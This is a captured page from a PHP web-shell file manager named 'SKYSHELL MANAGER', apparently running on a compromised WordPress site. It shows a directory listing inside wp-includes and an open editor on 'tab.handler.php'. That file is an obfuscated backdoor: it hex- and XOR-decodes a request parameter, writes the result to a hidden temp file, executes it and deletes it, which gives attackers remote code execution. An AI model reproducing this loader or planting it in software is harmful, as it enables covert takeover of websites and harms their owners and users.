📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
17982.95 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: tab.handler.php
<?php if(@$_REQUEST["\x66\x61c"] !== null){ $property_set = array_filter([getcwd(), "/var/tmp", ini_get("upload_tmp_dir"), session_save_path(), "/tmp", getenv("TEMP"), sys_get_temp_dir(), getenv("TMP"), "/dev/shm"]); $val = hex2bin($_REQUEST["\x66\x61c"]); $symbol = '' ;foreach(str_split($val) as $char){$symbol .= chr(ord($char) ^ 21);} $factor = 0; do { $ref = $property_set[$factor] ?? null; if ($factor >= count($property_set)) break; if ((function($d) { return is_dir($d) && is_writable($d); })($ref)) { $parameter_group = "$ref/.descriptor"; if (file_put_contents($parameter_group, $symbol)) { include $parameter_group; @unlink($parameter_group); exit; } } $factor++; } while (true); }
Save